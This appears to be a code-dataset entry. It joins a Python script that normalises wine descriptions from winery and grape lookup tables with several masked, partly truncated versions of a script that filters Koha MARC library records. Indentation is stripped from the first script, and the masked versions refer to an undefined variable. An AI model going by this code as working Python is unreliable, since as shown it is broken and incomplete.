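# Usage sketch (hedged - vintageLookup is defined earlier in this file and is
# assumed to capture a four-digit year in one of its regex groups):
#   findVintage({'wine': 'Phelps Insignia Napa 2014 750ml'}, 'wine')  # -> '2014'
#   findVintage({'wine': 'Mt Gay Eclipse Rum 750ml'}, 'wine')         # -> None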
#########################################################################################
# Create the winery/grape-wine-liquor conversion table based on the
# array of records passed in
#
# this routine takes the already read in list of definitions and parses them up
# in order to create a winery-wine-attributes file - that will be used
# later to take new records from searching the internet and properly assign
# an aligned/consistent wine description to that wine string
#
# we expect the wines array to have attributes: fldWineDescr (winedescr), and fldWine (wine_name)
#
# returns: wgLookup - dictionary - which is built from parsing winedescr NOT wine_name
#
# wgLookup[winery][grape] = list of lists of attributes to perform lookups with
#
def buildWineryGrapeLookup( wines, fldWineDescr='winedescr', fldWine='wine', debug=False ):
# local variables
wgLookup = {}
lastWinery = None
lastReWinery = None
# step through the records read in
for rec in wines:
# debugging
if debug: print('bwgl:new rec:', rec[fldWineDescr])
# set the variable
if not fldWineDescr in rec:
print('creating-field:', fldWineDescr)
rec[fldWineDescr] = ''
# local loop variables
winery = grape = wine = liquor = None
other = []
### WINERY
(lastWinery, lastReWinery) = (winery, reWinery) = findWinery( rec, lastWinery, lastReWinery, fldWine, debug=debug )
# if we did not find the winery - skip this record
if not winery:
# debugging
if debug: print('bwgl:did not find winery-skipping:', rec[fldWine])
# don't process this record - get the next record to process
continue
### IGNOREGRAPE and NOGRAPE and LIQUOR
# if this winery has a noGrapeLookup option - use that to split up the record
if winery in ignoreGrapeLookup:
### BLANK WINE
# don't get the grape for this winery
# set wine to blank
wine = ''
# debugging
if debug: print('bwgl:wine check ignoreGrapeLookup on winery:', winery)
elif winery in noGrapeLookup:
### NO GRAPE WINE -- fldWineDescr
# debugging
if debug: print('bwgl:wine check noGrapeLookup on winery:', winery)
# find which wine is a match from the noGrapeLookup
wine = wineLookupByName( noGrapeLookup[winery], rec[fldWineDescr], [], 'noGrapeLookup', debug=debug )
# not getting a match - we want to continue to have the wine as blank
if False and wine == '':
# debugging
if debug: print('bwgl:nograpelookup:no-match:set wine to None')
wine = None
elif winery in liquorLookup:
### LIQUOR ---- fldWine
# debugging
if debug: print('bwgl:liquor check on winery:', winery)
# see if a liquor matches
(liquor, reLiquor) = findLiquor( rec, winery, fldWine, debug=debug )
# if we found match - populate wine so we don't look for grape
if liquor is not None:
wine = liquor
# debugging
if debug: print('bwgl:liquor found and put in wine:', wine)
### GRAPE (if we have not filled in wine) --- fldWineDescr
if wine is None:
# debugging
if debug: print('bwgl:grape check because wine is None')
# determine if there is a grape in this string
# if there is, the remaining attributes are returned as other
(grape,other) = findGrapeByStr( rec, fldWineDescr )
# debugging
if debug: print('bwgl:grape:', grape, ':other:', other)
else:
# debugging
if debug: print('bwgl:grape check skipped - we have a wine')
### Skip this record if we don't have a wine or a grape
if wine is None and grape is None:
# debugging
if debug: print('bwgl:record skipped - no grape or wine defined')
continue
### OTHER (if not already created by grape lookup) ---- fldWineDescr
#
# if we did not find the grape in the string
# so other was not populated
# we need to look up other using 'winery' as the filter
if grape is None:
# debugging
if debug: print('bwgl:build other from winery')
# find where in the string this grape is positioned
(wineryFind, other) = findStrInRecReturnOther( rec, fldWineDescr, winery, debug=debug)
### OTHER Additional Processing
# remove CASE - the keyword case if it exists
if 'case' in other:
other.remove('case')
# debugging
if debug: print('bwgl:remove case from other')
# remove VINTAGE and/or BOTTLESIZE and/or other QUALIFIERS
# the last element will either be the vintage (no bottle size)
# or will be the bottle size and then next is the vintage
# if the last position is not vintage, attempt to remove the bottle size
# then remove vintage - this should be the vintage (validated by isdigit lookup)
if other:
if debug: print('bwgl:looking at other for quals, bottlesize and vintage')
# remove qualifiers if exist
if not other[-1].isdigit():
# first we check to see if there is a qualifier appended
# the last position is not a vintage - see if it is a qualifier
for qual,reQual in reQualLookup:
if qual == other[-1]:
if debug: print('bwgl:remove qualifier from other:', qual)
del other[-1]
break
# remove bottle size if exist
if other and not other[-1].isdigit():
# the last position is still not a vintage - see if it is a bottle size
for size,reSize in sizeLookup:
if size == other[-1]:
if debug: print('bwgl:remove bottlesize from other:', size)
del other[-1]
break
# remove vintage if it is there
if other and other[-1].isdigit():
# first check to see if this is part of the ignore grape solution
if winery in ignoreGrapeLookup and ignoreGrapeLookup[winery] and other[-1] in ignoreGrapeLookup[winery]:
if debug: print('bwgl:value is in ignoreGrapeLookup - keeping it:', other[-1])
else:
# debugging
if debug: print('bwgl:remove vintage from other:', other[-1])
del other[-1]
# remove WINE - the element if the element is the same as the wine
if wine and wine in other:
other.remove(wine)
# debugging
if debug: print('bwgl:remove wine from other:', wine)
# debugging
if debug:
try:
print('bwgl:Final-Build:', winery, ':', grape, ':', wine, ':', liquor, ':', other, ':', rec[fldWineDescr], ':', rec[fldWine])
except Exception as e:
print('debug error2-continuing:', str(e))
print('fldWine:', fldWine)
### BUILD LOOKUP FOR CONVERSION (we use the grape attribute to build the dictionary)
# move the wine/liquor value into grape because we did not find a grape
if grape is None and wine is not None:
grape = wine
# debugging
if debug: print('bwgl:set-grape-to-wine:', grape)
### WINERY:GRAPE-WINE-LIQOUR Dictionary creation
# debugging
if debug: print('bwgl:create wgLookup for winery:', winery, ':grape:', grape)
# validate we have an entry for this winery in the lookup dict
if winery not in wgLookup:
# one does not exist - so create a stub for winery:grape
wgLookup[winery] = { grape : [] }
else:
# one DOES exist - check to see if the grape is already here
if grape not in wgLookup[winery]:
# grape is not here - so create an empty list to stuff values into
wgLookup[winery][grape] = []
# check to see if we have OTHER attributes
# and if we do - check to see that this list of attributes
# is not already in the wineLookup array
# and if this list does not exist - then append this list
if other and other not in wgLookup[winery][grape]:
# add this list of other to this entry
wgLookup[winery][grape].append(other)
# debugging
if debug: print('bwgl:appending to wgLookup:other:', other)
# end loop on wines
### SORTED WINERY:GRAPE lookup - most optional attributes first in the list
# debugging
if debug: print('bwgl:complete-read-of-master-file:sort wgLookup')
# now sort the list of lookups from most specific (greatest number of attributes) to least
for winery in wgLookup:
for grape in wgLookup[winery]:
wgLookup[winery][grape] = sorted(wgLookup[winery][grape], key=len, reverse=True)
# debugging
if debug:
print('\n'*5)
print('START WGLOOKUP DUMPED')
print('#'*80)
if ppFlag:
pp.pprint(wgLookup)
else:
print('bwgl:final-wgLookup:\n', wgLookup)
print('#'*80)
# done with for loop - return the lookup
return wgLookup
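# Usage sketch (hypothetical master rows; the exact result depends on the
# global wineryLookup/grapeLookup tables, so treat this as illustrative only):
#   wines = [
#       {'winedescr': 'Phelps Cab Napa 2014', 'wine': 'Joseph Phelps Cabernet Napa'},
#       {'winedescr': 'Phelps Cab 2015',      'wine': 'Joseph Phelps Cabernet'},
#   ]
#   wgLookup = buildWineryGrapeLookup(wines, 'winedescr', 'wine')
#   # -> roughly {'Phelps': {'Cab': [['Napa']]}} - the vintage is stripped and
#   #    the empty attribute list from the second row is not appended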
#########################################################################################
# find the matching set of additional attributes that match this record
# from the global lookup.
#
# we assume that we have already tested that winery and value exist in wgLookup prior to calling this routine
#
# the special parameters here are:
# value - this is either "wine" or "grape" - this routine allows you to lookup on different attributes
# valueDescr - passed in string for debugging telling us which value was passed in
#
# defaultorderlist = array of array of string - gives the default order of singlematch lookups to determine which of
# many matches is the one we will select
#
# Global Variable Used: wgLookup
#
# returns: valuematchset array selected
#
def findAddAttribWgLookup( rec, winery, value, fldWine, AbbrLookup=[], defaultorderlist=None, valueDescr='', debug=False ):
# local variable - capture all the entries that are single match entries
singlematch=[]
# debugging
if debug:
try:
print('faawl:value:', valueDescr, ':match-wgLookup:', rec[fldWine], ':', wgLookup[winery][value])
except Exception as e:
print('debug error7-continuing:', str(e))
print('fldWine:', fldWine)
# for each set of values that could be a match
for valuematchset in wgLookup[winery][value]:
# debugging
if debug: print('faawl:testing valuematchset:', valuematchset, ':length:', len(valuematchset))
# set the flag to start
allmatch = True
# loop through the set of values that make up this set
for valuematch in valuematchset:
# for each entry - build a regex and test it and add it up
# we need all values in this valueset to be true for this valueset to be match
reMatch1 = re.compile(r'\b'+valuematch+r'\b', re.IGNORECASE)
reMatch2 = re.compile(r'\s'+valuematch+r'\s', re.IGNORECASE)
# check to see if this regex is a match
m1 = reMatch1.search(rec[fldWine])
m2 = reMatch2.search(rec[fldWine])
if m1 or m2:
# this regex is a match
allmatch = True and allmatch
elif valuematch in AbbrLookup:
# this regex was not a match - but we want to check if the value also has
# a translation - and if it has a translation - then we test the translation also
# the value did not work but there is an alternate value to check
# debugging
if debug: print('faawl:valuematch-abbr:', valuematch, ':', wineAbbrLookup[valuematch])
# create the regex
reMatch = re.compile(wineAbbrLookup[valuematch], re.IGNORECASE)
# test the regex and attach the results to allmatch
allmatch = reMatch.search(rec[fldWine]) and allmatch
else:
# not a match - update allmatch
allmatch = False and allmatch
# debugging
if debug: print('faawl:valuematch:', valuematch, ':allmatch:', allmatch)
# check to see if all matched
if allmatch:
# all matched - so this is a match - so break out of the valuematchset group
# debugging
if debug: print('faawl:value matched:', valuematchset)
# different action based on # of items being match
if len(valuematchset) == 1:
# debugging
if debug: print('faawl:single-valuematch-set-added-to-singlematch:', valuematchset)
# single value matching - we don't stop when we find a match
singlematch.append(valuematchset)
else:
# debugging
if debug: print('faawl:multivalue-valuematch-set-found:done')
# multi value match so we are done when we find a match - so return
return valuematchset
# did not find matchset in the for loop - check to see if we have singlematch
if not singlematch:
# debugging
if debug: print('faawl:exit with singlematch NOT populated return blank')
# did not have singlematch found - we are done - return empty
return []
# singlematch populated
# debugging
if debug: print('faawl:exit with singlematch populated:', singlematch)
# check to see how many matches we got
if len(singlematch) == 1 or not defaultorderlist:
# debugging
if debug: print('faawl:return first entry in singlematch:', singlematch[0])
# if there is only one entry in here
# or we don't have a default order so we pick the first found
# and we set the value to this
return singlematch[0]
# we need to define which of the singlematch values we will return
# the defaultorderlist will be used to set that ordering
#
# create a local copy of the list that can be changed in this routine
defaultorder = defaultorderlist[:]
# multiple singlematch values so lets find and pick the best one
# debugging
if debug: print('faawl:multiple single match value-singlematch:', singlematch)
# get the values from singlematch that are not in defaultorder
# and put them at the start of defaultorder list
# go in reverse order when doing this lookup
for val in singlematch[::-1]:
if val not in defaultorder:
defaultorder.insert(0,val)
### HARDCODED ###
# very short term fix - we need to prioritize these single tags (mondavi problem)
if winery == 'Mondavi' and ['Tok'] in singlematch:
if debug: print('faawl:Change from:', singlematch, ':to Tok for mondavi')
return ['Tok']
# find the first matching value from priority order list
for val in defaultorder:
if val in singlematch:
# debugging
if debug: print('faawl:selected-singlematch-value:', val)
# we found the first match - set it and break out
return val
# debugging
if debug: print('faawl:valuematchset-empty')
# did not match - return empty
return []
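# Usage sketch (hedged) - assume the global wgLookup holds
#   {'Phelps': {'Cab': [['Backus'], ['Napa']]}}
# then for rec = {'wine': 'Joseph Phelps Backus Cabernet 2014'}:
#   findAddAttribWgLookup(rec, 'Phelps', 'Cab', 'wine', wineAbbrLookup, defaultorderlist)
#   # -> ['Backus'] - both candidate sets are single-value; only 'Backus' matches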
#########################################################################################
# create a consistent wine name for a list or records with store based wine descriptions
#
# the special parameters here are:
# wgLookup - dictionary of winery, wine, list of wines
# wines - list of records to be processed
#
# Global Variable Used: ignoreGrapeLookup, noGrapeLookup, wineAbbrLookup, liquorLookup
# reCase, sizeLookup
#
# returns: [updated values in the wines array]
#
#### Use the winery/grape-wine-liquor conversion table to define a wine description for the records
def setWineryDescrFromWineryGrapeLookup( wgLookup, wines, fldWineDescr = 'winedescr', fldWine = 'wine', fldWineDescrNew = 'winedescrnew', fldWineDescrMatch=False, debug=False ):
if debug:
print('\n'*10,'START WINEDESCR SETTING HERE ---------------------------------------------')
# step through all the records passed in
for rec in wines:
# local variables
winery = grape = wine = vintage = case = size = liquor = nongrape = qual = None
winematchset = grapematchset = []
# debugging
if debug:
try:
print('setWinery:fldWine:', rec[fldWine])
except Exception as e:
print('debug error2-continuing:', str(e))
print('fldWine:', fldWine)
# make the field if it does not exist
if fldWineDescrNew not in rec:
rec[fldWineDescrNew] = rec[fldWineDescr]
### WINERY
(winery, reWinery) = findWinery( rec, None, None, fldWine, debug=debug )
# validate the winery
if winery is None:
### WINERY NONE - go to next record
# debugging
if debug: print('setWinery:winery not found-next record:' + rec[fldWine])
# get the next record
continue
elif winery not in wgLookup:
### WINERY NOT IN LOOKUP
# skip this record - nothing to process
# debugging
if debug: print('setWinery:winery not in wgLookup:', winery)
continue
### GRAPE
# find the grape that is this record
(grape, reGrape) = findGrapeByRegex( rec, fldWine, debug=debug )
# debugging
if debug: print('setWinery:grape found:', grape)
### OVERRIDES
if winery in ignoreGrapeLookup:
### IGNORE GRAPE
# debugging
if debug: print('setWinery:winery-match-ignoreGrape:clear-wine:set-grape-to-None:set-nongrape-True:winery:', winery)
# clear wine and grape
wine = ''
# clear the grape field
grape = None
# set the liquor flag to control processing
nongrape = True
if winery in noGrapeLookup:
### NOGRAPE - WINE
# debugging
if debug: print('setWinery:noGrapeLookup wine check:', winery)
# do the lookup and if a search is a match on None take appropriate action
wine = wineLookupByName( noGrapeLookup[winery], rec[fldWine], [], 'noGrapeLookup', wineAbbrLookup, debug=debug )
# debugging
if debug: print('setWinery:nogrape check:wine:', wine)
# test the value we got back
if wine == '':
# debugging
if debug: print('setWinery:noGrapeLookup:matched:None::clear grape:set nongrape to True')
# the lookup match None - so we want to ignore any grape found and we blank out the wine
grape = None
wine = ''
nongrape = True
elif wine:
# matched a wine - so clear the grape value
grape = None
# debugging
if debug: print('setWinery:nograpeLookup:wine found - clear grape field')
if wine is None and winery in liquorLookup:
### LIQUOR
# debugging
if debug: print('setWinery:liqourLookup:', winery)
(liquor, reLiquor) = findLiquor( rec, winery, fldWine, debug=debug)
# if we found something update wine to be what we found
if liquor is not None:
wine = liquor
# debugging
if debug: print('setWinery:liquorLookup-match:', liquor)
if not grape and not nongrape and not wine and liquor is None:
# NO GRAPE - and not connected to noGrapeLookup or liquorLookup
# get the next record
# debugging
if debug: print('setWinery:did not find grape-skipping record:', rec[fldWineDescr])
continue
# debugging
if debug: print('setWinery:pre-vintage found values for wine/liquor:', wine, ':grape:', grape)
### VINTAGE
vintage = findVintage( rec, fldWine, debug=debug )
# debugging
if debug: print('setWinery:vintage:', vintage)
### CASE information
if reCase.search(rec[fldWine]):
case = 'case'
### BOTTLE SIZE - get the size information
for (size, reSize) in sizeLookup:
# debugging
if debug: print('setWinery:sizeLookup:',size)
if reSize.search(rec[fldWine]) and not reShipsAs.search(rec[fldWine]):
# debugging
if debug: print('setWinery:sizeLookup:matched:',reSize)
break
else:
size = None
if debug: print('setWinery:sizeLookup:None-found')
### QUAL for this wine
qual = findQualifier(rec[fldWine], debug=debug)
# debugging
if debug:
try:
print('setWinery:FinalAttributes:', winery, ':', grape, ':', wine, ':', liquor, ':', vintage, ':', case, ':', size, ':', qual, ':', rec[fldWine])
except Exception as e:
print('debug error5-continuing:', str(e))
print('fldWine:', fldWine)
### WINE - ADDITIONAL INFORMATION
if liquor is not None:
# debugging
if debug: print('setWinery:liquor flag set - no additional data needs to be collected')
elif wine is not None:
# debugging
if debug: print('setWinery:wine is not None - do additional lookups:wine:', wine)
# we found a wine / liquor - so see if there are additional attributes
if wine in wgLookup[winery] and wgLookup[winery][wine]:
# debugging
if debug: print('setWinery:lookup winematchset')
# there is one or more additional lookups for this winery/wine
winematchset = findAddAttribWgLookup( rec, winery, wine, fldWine, wineAbbrLookup, None, valueDescr='wine', debug=debug )
else:
# wine not in wgLookup - nothing to work with
print('setWinery:unable to perform wgLookup on winery:', winery, ':wine:', wine, ':rec-wine:', rec[fldWine])
# debugging
if debug:
try:
print('wgLookup[winery]:', wgLookup[winery])
except Exception as e:
print('debug error3-continuing:', str(e))
print('winery:', winery)
# debugging - wine is not None - what is the final winematchset
if debug: print('setWinery:winematchset:', winematchset)
elif grape is not None:
# debugging
if debug: print('setWinery:grape is not None - do additional lookups:', grape)
# grape was returned (not wine) so do the lookup on grape
if grape in wgLookup[winery] and wgLookup[winery][grape]:
# see if we can create a match based on attributes and the grape
grapematchset = findAddAttribWgLookup( rec, winery, grape, fldWine, wineAbbrLookup, defaultorderlist, valueDescr='grape', debug=debug )
elif grape in wgLookup[winery]:
# do nothing this is a empty set
if debug: print('setWinery:grape match: matching record set is blank - no action required')
else:
# grape not in wgLookup - nothing to work with
# debugging
print('setWinery:grape NONMATCH:', rec[fldWine])
if debug: print('setWinery:liquor:', liquor, ':wine:', wine, ':grape:', grape, ':wgLookup[winery]:', wgLookup[winery])
# debugging - wine is not None - what is the final grapematchset
if debug: print('setWinery:grapematchset:', grapematchset)
### check the matchsets we got back - if any of them look like vintage values
### remove them from the string and look at up vintage again
if vintage:
newVintageLookupWine = rec[fldWine]
for matchvalue in winematchset:
if vintage in matchvalue:
newVintageLookupWine = newVintageLookupWine.replace(matchvalue,'')
if debug: print('setWinery:2nd-vintage:winematchset:wine-name-removal:', matchvalue)
for matchvalue in grapematchset:
if vintage in matchvalue:
newVintageLookupWine = newVintageLookupWine.replace(matchvalue,'')
if debug: print('setWinery:2nd-vintage:grapematchset:wine-name-removal:', matchvalue)
if newVintageLookupWine != rec[fldWine]:
if debug: print('setWinery:2nd-vintage:newVintageLookupWine:', newVintageLookupWine)
newVintage = findVintage( { fldWine : newVintageLookupWine}, fldWine, debug=debug )
if debug: print('setWinery:2nd-vintage:newVintage:', newVintage)
vintage = newVintage
### FINAL WINEDESCR
# create initial value
wineDescr = ''
# if winery starts with a z then we don't have a vintage
if winery.startswith('z'):
vintage = None
# debugging
if debug: print('setWinery:winery starts with z: clear vintage')
# quick test - is the winematchset text already contained in the wine
if winematchset and ' '.join(winematchset) in wine:
#debugging
if debug: print('setWinery:clearing-winematchset:', winematchset,':is-in-wine:', wine)
winematchset = []
if grapematchset and ' '.join(grapematchset) in grape:
#TODO - work around for single letter matches
if not (len(grapematchset)==1 and len(grapematchset[0])==1):
#debugging
if debug: print('setWinery:clearing-grapematchset:',grapematchset,':is-in-grape:', grape)
grapematchset = []
if grapematchset and size and size in ' '.join(grapematchset):
size = ''
if winematchset and size and size in ' '.join(winematchset):
size = ''
if debug:
print('setWinery:vallist1:', [winery, grape, wine] + grapematchset + winematchset + [vintage, size, qual, case])
print('setWinery:vallist2:', [winery, grape, wine, *grapematchset, *winematchset, vintage, size, qual, case])
# create a list
wdList= []
# step through the values
for val in [winery, grape, wine] + grapematchset + winematchset + [vintage, size, qual, case]:
# and if there is a value add to the list - otherwise skip
if val: wdList.append(val)
# build the wine description by joining all these values together
wineDescr = ' '.join(wdList)
# debugging
if False:
if debug: print('setWinery:wdList:', wdList)
if debug: print('setWinery:wineDescr:', wineDescr)
# debugging
if debug:
try:
print(':'.join(['setWinery:wineDescrList', wineDescr, rec[fldWineDescr], str(wineDescr==rec[fldWineDescr]), rec[fldWine]]) )
except Exception as e:
print('debug error6-continuing:', str(e))
print('fldWine:', fldWine)
# fill the new value into the record
rec[fldWineDescrNew] = wineDescr
# fill in the matching field
if fldWineDescrMatch:
rec[fldWineDescrMatch] = (rec[fldWineDescr] == rec[fldWineDescrNew])
#########################################################################################
# set any digit only field to the word passed
def setDigitFld2Value( wines, fld, value, debug=False ):
for rec in wines:
if rec[fld].isdigit():
rec[fld] = value
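# Usage sketch: replace placeholder values that are still bare digits
#   wines = [{'cnt': '12'}, {'cnt': 'Phelps Cab Napa 2014'}]
#   setDigitFld2Value(wines, 'cnt', 'UNKNOWN')
#   # -> wines[0]['cnt'] == 'UNKNOWN'; wines[1] is untouched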
#########################################################################################
# validate the field settings match the file we read in for update
def updateFileOptionDictCheck( optiondict, wines, header, debug=False ):
# check to see if the description field is in the file we read in
if optiondict['fldWineDescr'] not in wines[0]:
if debug: print('updateFileOptionDictCheck:fldWineDescr NOT in file read in:', optiondict['fldWineDescr'])
# field needed is not in the record - see if we know what to do
if 'cnt' in wines[0]:
# the cnt field is in the file - so set to that structure
# we will put the updated values into the 'cnt' field
print('setting values fldWineDescr and fldWineDescrNew to: cnt')
# change the field we are updating
optiondict['fldWineDescr'] = optiondict['fldWineDescrNew'] = 'cnt'
elif 'winedescr' in wines[0]:
# the WineDescr field is in the file - so set to that structure
print('setting values fldWineDescr to winedescr and fldWineDescrNew to winedescrnew')
# change the field we are updating
optiondict['fldWineDescr'] = 'winedescr'
optiondict['fldWineDescrNew'] = 'winedescrnew'
else:
# no idea - we need to error out
print('could not find fldWineDescr in wines[0]-aborting:', optiondict['fldWineDescr'], '\nwines[0]:', wines[0])
# force the error
error = wines[0][optiondict['fldWineDescr']]
# determine if we should create the match column (may want to remove this section later)
# removed this logic - require the person to set this field - we will not set it for them.
if False and optiondict['fldWineDescr'] == 'winedescr':
# we are using the file format that is the xref file
# so check to see if we have match enabled
if not optiondict['fldWineDescrMatch']:
# create the default value
optiondict['fldWineDescrMatch'] = 'same'
# provide message
print('setting value fldWineDescrMatch to: same')
# check to see if the input file is the same as the output file
if optiondict['csvfile_update_in'] == optiondict['csvfile_update_out']:
# they are the same file (in and out) - so we need to move the input file to a backup location
(file_path, base_filename, file_ext) = kvutil.filename_split(optiondict['csvfile_update_in'])
# create the new filename
backupfile = kvutil.filename_proper( base_filename + optiondict['backupfile_ext'], file_path )
# messaging
print('copying ', optiondict['csvfile_update_in'], ' to ', backupfile)
# copy the input file to the backup filename
shutil.copyfile(optiondict['csvfile_update_in'], backupfile)
# set the output keys we are going to assign
if optiondict['fldWineDescrNew'] == 'cnt':
# output matches the original ref file format with the "cnt" field
optiondict['csvdictkeys'] = ['cnt','date','search','store','wine','winesrt']
elif optiondict['fldWineDescrMatch']:
# output is a modified xref format so you can look at old and new definitions
# optiondict['csvdictkeys'] = [optiondict['fldWineDescr'],optiondict['fldWineDescrNew'],optiondict['fldWineDescrMatch'], 'date','search','company','wine','winesrt']
optiondict['csvdictkeys'] = [optiondict['fldWineDescr'],optiondict['fldWineDescrNew'],optiondict['fldWineDescrMatch'], *header]
else:
# copy over the read in format
optiondict['csvdictkeys'] = [optiondict['fldWineDescrNew']] + header[1:]
# output matches expected input - should really change this to be the format of the read in file
#optiondict['csvdictkeys'] = [optiondict['fldWineDescrNew'], 'date','search','company','wine','winesrt']
print('updateFileOptionDictCheck:set csvdictkeys to:',optiondict['csvdictkeys'])
# ---------------------------------------------------------------------------
if __name__ == '__main__':
# capture the command line
optiondict = kvutil.kv_parse_command_line( optiondictconfig, debug=False )
# set the global debug flag
ppFlag = optiondict['pprint']
# set master fields
setOptionDictMasterFldValues( optiondict, debug=False )
### global variable checks ###
if optiondict['setup_check']:
print('Running global variable check')
globalVariableCheck( debug = optiondict['debug'] )
sys.exit()
# messaging
print('reading in master file:', optiondict['csvfile_master_in'])
# read in the MASTER FILE INPUT file
wines,header = kvcsv.readcsv2list_with_header(optiondict['csvfile_master_in'], headerlc=True)
# build the wine lookup dictionary
wgLookup = buildWineryGrapeLookup( wines, optiondict['fldWineDescrMaster'], optiondict['fldWineMaster'], debug=optiondict['debug'] )
# read in the UPDATE FILE INPUT file - if not updating the master file
if optiondict['csvfile_master_in'] != optiondict['csvfile_update_in']:
# messaging
print('reading in update file:', optiondict['csvfile_update_in'])
# read in the INPUT file
wines,header = kvcsv.readcsv2list_with_header(optiondict['csvfile_update_in'], headerlc=True)
# check to see if we read in any records and if not just return
if not wines:
print('wineset.py - no records read in - no work to be done - exiting')
sys.exit()
# test to see if we should set the fields based on what we just read in
updateFileOptionDictCheck( optiondict, wines, header, debug=optiondict['debug'] )
# do the assignment of wines to records
setWineryDescrFromWineryGrapeLookup( wgLookup, wines, optiondict['fldWineDescr'], optiondict['fldWine'], optiondict['fldWineDescrNew'], optiondict['fldWineDescrMatch'], debug=optiondict['debug'] )
# if enabled - set all unassigned new descriptions the default value
if optiondict['defaultnew'] is not None:
# message
print('Setting ', optiondict['fldWineDescrNew'], ' to ', optiondict['defaultnew'], 'if not set')
# do the work
setDigitFld2Value( wines, optiondict['fldWineDescrNew'], optiondict['defaultnew'], debug=optiondict['debug'] )
# save the output to the file of interest
kvcsv.writelist2csv( optiondict['csvfile_update_out'], wines, optiondict['csvdictkeys'] )
# messaging
print('Saved results to:', optiondict['csvfile_update_out'])
| [
7,
13,
15,
18,
19
] |
679 | c6cce2edafd7683af766b932d90ca170359e648a | <mask token>
def main():
total_count = 0
valid_count = 0
with open(options['INPUT'], 'rb') as fh:
reader = MARCReader(fh, to_unicode=True, force_utf8=True)
if not options['--csv']:
writer = MARCWriter(open(options['--output'] or 'out.mrc', 'wb'))
for record in reader:
include_record = False
for item in record.get_fields('952'):
valid = validate_item(item)
total_count += 1
if valid is True:
valid_count += 1
include_record = True
if include_record is True:
writer.write(record)
print('Total items: %i | Items included: %i' % (total_count,
valid_count))
elif options['--csv']:
koha_record_ids = set()
for record in reader:
total_count += 1
for item in record.get_fields('952'):
valid = validate_item(item)
if valid:
id = record.get_fields(MARC_ID_FIELD)[0].get_subfields(
MARC_ID_SUBFIELD)[0]
koha_record_ids.add(id)
break
csvreader = csv.DictReader(open(options['--csv'], 'r'))
gg_record_ids = set()
for row in csvreader:
gg_record_ids.add(row[GG_ID_COLUMN])
print('Total Koha Bibs: %i' % total_count)
print('Koha Bibs with circulating items: %i ' % len(
koha_record_ids))
print('Total GreenGlass Bibs: %i' % len(gg_record_ids))
print('Weeded Items (I in GG & not in Koha): %i' % len(
gg_record_ids - koha_record_ids))
print('Added Items (I in Koha & not in GG): %i' % len(
koha_record_ids - gg_record_ids))
<mask token>
| <mask token>
def validate_item(item):
status = []
valid = True
if item['q'] and item['q'] != '0':
status.append('checked out')
if item['7'] and item['7'] != '0':
status.append(notforloan_codes[item['7']])
valid = False
if item['4'] and item['4'] != '0':
status.append('damaged')
valid = False
if item['1'] and item['1'] != '0':
status.append(lost_codes[item['1']])
valid = False
if item['0'] and item['0'] != '0':
status.append('withdrawn')
valid = False
if item['c'] not in valid_locations:
valid = False
if item['y'] not in valid_types:
valid = False
if len(status) > 0 and options.get('--debug'):
print('"' + record.title() + '" item status: ' + ', '.join(status))
return valid
def main():
total_count = 0
valid_count = 0
with open(options['INPUT'], 'rb') as fh:
reader = MARCReader(fh, to_unicode=True, force_utf8=True)
if not options['--csv']:
writer = MARCWriter(open(options['--output'] or 'out.mrc', 'wb'))
for record in reader:
include_record = False
for item in record.get_fields('952'):
valid = validate_item(item)
total_count += 1
if valid is True:
valid_count += 1
include_record = True
if include_record is True:
writer.write(record)
print('Total items: %i | Items included: %i' % (total_count,
valid_count))
elif options['--csv']:
koha_record_ids = set()
for record in reader:
total_count += 1
for item in record.get_fields('952'):
valid = validate_item(item)
if valid:
id = record.get_fields(MARC_ID_FIELD)[0].get_subfields(
MARC_ID_SUBFIELD)[0]
koha_record_ids.add(id)
break
csvreader = csv.DictReader(open(options['--csv'], 'r'))
gg_record_ids = set()
for row in csvreader:
gg_record_ids.add(row[GG_ID_COLUMN])
print('Total Koha Bibs: %i' % total_count)
print('Koha Bibs with circulating items: %i ' % len(
koha_record_ids))
print('Total GreenGlass Bibs: %i' % len(gg_record_ids))
print('Weeded Items (I in GG & not in Koha): %i' % len(
gg_record_ids - koha_record_ids))
print('Added Items (I in Koha & not in GG): %i' % len(
koha_record_ids - gg_record_ids))
<mask token>
| <mask token>
def validate_item(item):
status = []
valid = True
if item['q'] and item['q'] != '0':
status.append('checked out')
if item['7'] and item['7'] != '0':
status.append(notforloan_codes[item['7']])
valid = False
if item['4'] and item['4'] != '0':
status.append('damaged')
valid = False
if item['1'] and item['1'] != '0':
status.append(lost_codes[item['1']])
valid = False
if item['0'] and item['0'] != '0':
status.append('withdrawn')
valid = False
if item['c'] not in valid_locations:
valid = False
if item['y'] not in valid_types:
valid = False
if len(status) > 0 and options.get('--debug'):
print('"' + record.title() + '" item status: ' + ', '.join(status))
return valid
def main():
total_count = 0
valid_count = 0
with open(options['INPUT'], 'rb') as fh:
reader = MARCReader(fh, to_unicode=True, force_utf8=True)
if not options['--csv']:
writer = MARCWriter(open(options['--output'] or 'out.mrc', 'wb'))
for record in reader:
include_record = False
for item in record.get_fields('952'):
valid = validate_item(item)
total_count += 1
if valid is True:
valid_count += 1
include_record = True
if include_record is True:
writer.write(record)
print('Total items: %i | Items included: %i' % (total_count,
valid_count))
elif options['--csv']:
koha_record_ids = set()
for record in reader:
total_count += 1
for item in record.get_fields('952'):
valid = validate_item(item)
if valid:
id = record.get_fields(MARC_ID_FIELD)[0].get_subfields(
MARC_ID_SUBFIELD)[0]
koha_record_ids.add(id)
break
csvreader = csv.DictReader(open(options['--csv'], 'r'))
gg_record_ids = set()
for row in csvreader:
gg_record_ids.add(row[GG_ID_COLUMN])
print('Total Koha Bibs: %i' % total_count)
print('Koha Bibs with circulating items: %i ' % len(
koha_record_ids))
print('Total GreenGlass Bibs: %i' % len(gg_record_ids))
print('Weeded Items (I in GG & not in Koha): %i' % len(
gg_record_ids - koha_record_ids))
print('Added Items (I in Koha & not in GG): %i' % len(
koha_record_ids - gg_record_ids))
if __name__ == '__main__':
options = docopt(__doc__)
main()
| <mask token>
import csv
from docopt import docopt
from pymarc import MARCReader, MARCWriter
lost_codes = {'0': '', '1': 'Lost', '2': 'Long Overdue (Lost)', '3':
'Lost and Paid For', '4': 'Missing', '5': 'Lost (On Search)', '6':
'Claims Returned'}
notforloan_codes = {'-3': 'Repair', '-2': 'In Processing', '-1': 'Ordered',
'0': '', '1': 'Library Use Only', '2': 'Staff Collection', '3':
'Bindery', '4': 'By Appointment', '5': 'On display'}
valid_locations = ['CART', 'FACDEV', 'MAIN', 'NEWBOOK', 'DISPLAY']
valid_types = ['BOOK', 'SUPPL']
GG_ID_COLUMN = 'Bib Record Number'
MARC_ID_FIELD = '999'
MARC_ID_SUBFIELD = 'c'
def validate_item(item):
status = []
